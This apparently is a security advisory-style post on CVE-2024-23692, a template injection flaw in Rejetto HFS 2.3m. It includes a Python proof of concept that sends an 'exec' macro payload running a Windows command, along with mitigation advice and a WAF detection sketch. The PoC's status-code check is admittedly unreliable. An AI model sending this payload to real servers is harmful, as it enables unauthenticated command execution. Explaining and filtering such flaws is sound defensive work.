Rejetto HTTP File Server (HFS), a popular file-sharing application, has been found to contain a critical vulnerability (CVE-2024-23692) in versions up to and including 2.3m. This security flaw allows remote, unauthenticated attackers to execute arbitrary commands on the affected system using a specially crafted HTTP request. In this post, we will discuss the exploit details, examine a code snippet demonstrating the vulnerability, and provide links to original references. Lastly, we will discuss mitigation strategies for those who may still be using this unsupported software.

Exploit Details

The template injection vulnerability discovered in Rejetto HFS 2.3m affects the application's handling of user-controlled data in its template rendering process. Attackers can craft an HTTP request with malicious input, which will be processed and executed directly on the host system. This allows attackers to execute arbitrary commands, leading to unauthorized access or potential data loss.

The following PoC code snippet demonstrates the vulnerability:

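import requests

target = "http://target-server-ip:808/"

# Specially crafted HTTP request using '|' as a delimiter
payload = "%{.exec|cmd.exe /c dir.}"

headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

# Send the payload as the POST body; the timeout keeps the script from hanging
response = requests.post(target, data=payload, headers=headers, timeout=10)

# The check looks only at the status code; an HTTP 200 alone does not prove
# that the command ran
if response.status_code == 200:
    print("Vulnerable")
else:
    print("Not vulnerable")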

The above code snippet sends an HTTP POST request to a server running the vulnerable version of Rejetto HFS. The payload consists of the exec macro, the delimiter '|', and an arbitrary command. If the server is vulnerable, it will execute the command and return a positive response.

Original References

1. Rejetto HFS Official Repository
2. CVE-2024-23692 NVD Entry
3. Exploit-DB: Rejetto HFS 2.3m - Template Injection

Mitigation

As Rejetto HFS 2.3m is no longer supported, there are no official patches or updates to address this vulnerability. However, users have the following options to mitigate the risk:

1. Implement a Web Application Firewall (WAF) with specific rules to filter out malicious payloads.

2. Consider upgrading to a more recent, supported version of Rejetto HFS or an alternative file server application.
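
A sketch of the kind of filter rule the WAF option above refers to, as an added example (not code from Rejetto or from the references): it flags requests that contain the `{.exec|` macro form shown in the PoC, after undoing percent-encoding. The function names, the hypothetical `q` parameter, the decode limit and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# HFS template macro as it appears in the PoC: "{." name "|" arguments ".}"
# Only the opening "{.name|" is required, so a truncated body still matches.
MACRO_RE = re.compile(r"\{\.\s*([a-z0-9_]+)\s*\|", re.IGNORECASE)

# Macro names treated as command execution; "exec" is the one on this page.
BLOCKED_MACROS = {"exec"}

MAX_DECODE_ROUNDS = 3  # assumption: bound on nested percent-encoding


def decode_layers(raw: str):
    """Yield raw, then each successive percent-decoded form until stable."""
    current = raw
    yield current
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(current)
        if decoded == current:
            return
        current = decoded
        yield current


def find_blocked_macro(raw: str):
    """Return the blocked macro name found in raw, or None."""
    for layer in decode_layers(raw):
        for match in MACRO_RE.finditer(layer):
            name = match.group(1).lower()
            if name in BLOCKED_MACROS:
                return name
    return None


def should_block(target: str, body: str = "") -> bool:
    """WAF-style decision over the request target and the request body."""
    return any(find_blocked_macro(part) for part in (target, body))


# Constructed sample requests (not captured traffic): target, body, expected.
SAMPLES = [
    ("/", "%{.exec|cmd.exe /c dir.}", True),                 # PoC body
    ("/?q=%25%7B.ExEc%7Ccmd.exe%20/c%20dir.%7D", "", True),  # encoded, mixed case
    ("/?q=%2525%257B.exec%257Cx.%257D", "", True),           # encoded twice
    ("/files/report{.final.}.txt", "", False),               # braces, no macro call
    ("/docs/executive-summary.pdf", "name=a|b", False),      # pipe, no macro
]

if __name__ == "__main__":
    for target, body, expected in SAMPLES:
        print(should_block(target, body), expected, target, body)
```

A rule like this reduces exposure but does not remove the flaw, so it belongs alongside the replacement option rather than in place of it.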

Conclusion

Although Rejetto HFS 2.3m is no longer officially supported, its template injection vulnerability (CVE-2024-23692) can still pose a significant risk to users who continue to run this software. Understanding the details of this vulnerability and employing effective mitigation strategies is crucial in safeguarding against potential exploitation.

Timeline

Published on: 05/31/2024 10:15:09 UTC
Last modified on: 08/01/2024 23:15:46 UTC